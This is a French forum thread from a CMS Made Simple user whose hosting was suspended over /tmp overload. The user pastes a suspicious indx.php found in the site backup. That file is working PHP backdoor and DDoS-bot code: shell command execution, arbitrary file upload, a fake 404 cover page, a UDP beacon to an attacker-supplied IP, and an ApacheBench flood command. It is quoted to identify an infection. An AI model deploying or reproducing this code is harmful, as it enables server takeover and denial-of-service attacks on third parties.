[Résolu] Site bloqué par l'hebergeur suite à surcharge du /tmp.

[geantick]

Bonjour, merci de l'aide,

j'avais éliminé tout ce qui n'était pas cmsmadesimple.

Je viens de nettoyer la base de donnée des restes de vieux trucs installés.

Par contre effectivement, je viens de comparer ma sauvegarde à une installation fraîche, je trouve un fichier indx.php avec ce code qui me semble suspect:

Code :

[== PHP ==]
<?php
@set_time_limit(0);
@error_reporting(0);
$base = dirname(__FILE__)."/";
function stoped()
{
    @unlink($base."stph.php");
    @unlink($base."stcp.php");
    cmdexec("killall ping;");
    cmdexec("killall -9 perl;    killall -9 perl-bin;killall -9 perl-cgi;");
    @unlink($base."start.php");
    @unlink($base."f1.pl");
    @unlink($base."run.pl");
    @unlink($base."startphp.php");
    print "<stopcleandos>Stop & Clean</stopcleandos>";
}
function UploadFile($File)
{
    cmdexec("killall -9 perl");
    cmdexec("killall -9 perl-bin");
    cmdexec("killall -9 perl-cgi");
    $target_path ="./";
    $target_path = $target_path . basename( $File['name']);
    @move_uploaded_file($File['tmp_name'], $target_path);
}
function cmdexec($cmd)
{
    if(function_exists('exec'))@exec($cmd);
    elseif(function_exists('passthru'))@passthru($cmd);
    elseif(function_exists('shell_exec'))@shell_exec($cmd);
    elseif(function_exists('system'))@system($cmd);
    elseif(function_exists('popen'))@popen($cmd,"r");
}
function curPageURL()
{
    $pageURL = 'http';
    if ($_SERVER["HTTPS"] == "on")
    {
        $pageURL .= "s";
    }
    $pageURL .= "://";
    if ($_SERVER["SERVER_PORT"] != "80")
    {
        $pageURL .= $_SERVER["SERVER_NAME"].":".$_SERVER["SERVER_PORT"].$_SERVER["REQUEST_URI"];
    }
    else
    {
        $pageURL .= $_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"];
    }
    return $pageURL;
}
function DNullRequest()
{
    @ob_start();
    print "<!DOCTYPE HTML PUBLIC\"-//IETF//DTDHTML 2.0//EN\"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL ".$_SERVER['PHP_SELF']." was not found on this server </p><p>Additionally, a 404 Not Foun derror was encountered while trying to use an Error Document to handle the request</p></body></html>";
    die();
}
if ($_GET['action']=="status")
{
    print "itsoknoproblembro";
    exit();
}
if ($_GET['action']=="start.php")
{
    cmdexec("ps | grep -r perl");
    exit();
}
if ($_GET['action']=="startphp.php")
{
    cmdexec("ps | grep -r php");
    exit();
}

if($_REQUEST['action']=="stpf")
{
    $fp=fopen("ffff.txt","w+");
    fwrite($fp,"testsuccessrele");
    fclose($fp);
    $fp2=fopen("ffff.txt","r");
    $content=fread($fp2,filesize("ffff.txt"));
    if(eregi("testsuccessrele",$content))
    {
        if(extension_loaded('curl'))
        {
            print "itsoknoproblembrocurl";
        }
        else
        {
            print "itsoknoproblembro";
        }
    }
    fclose($fp2);
    unlink('ffff.txt');
    die();
    exit();
}
switch($_POST['action'])
{
    case "upload":UploadFile($_FILES['file']);
    break;
    case "stop":stoped();
    break;
    case "ust":$page = curPageURL();
    $ip = $_POST['ip'];
    $port = "11";
    $out = $page."\n";
    $socket = stream_socket_client("udp://$ip:$port");
    if ($socket) {stream_set_write_buffer($socket, 0);
    stream_socket_sendto($socket,$out);
}
fclose($socket);
break;
case "ab":$url = $_POST['url'];
$c = $_POST['c'];
$n = $_POST['n'];
cmdexec("ab -c $c -n $n $url");
break;
default:DNullRequest();
break;
}
?>